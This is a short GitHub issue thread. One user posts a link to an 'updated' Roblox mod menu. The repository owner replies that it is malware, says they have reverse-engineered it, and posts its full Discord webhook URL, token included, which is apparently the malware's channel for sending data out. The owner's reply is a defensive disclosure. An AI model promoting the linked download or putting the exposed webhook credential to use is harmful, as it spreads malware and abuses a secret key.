### ISSUE TITLE
I uploaded updated version

### ISSUE THREAD

**Issue by marian-dev0** [plusgiant5/TaaprWareV3#3]
I uploaded the updated version here:
[https://github.com/marian-dev0/Roblox-Mod-Menu](https://github.com/marian-dev0/Roblox-Mod-Menu)

**Comment by plusgiant5** [comment]
Hello, skid, I'm sorry to notify you that I have reversed your skidded malware. Good luck next time!
Webhook: https://discord.com/api/webhooks/1098635781309993052/0-izyw9dRHGQMidXzDaJ1tE5WWVWTpSC32pTduYGZK1Bjg7prCgFDh9vpbLduwnZIKkF
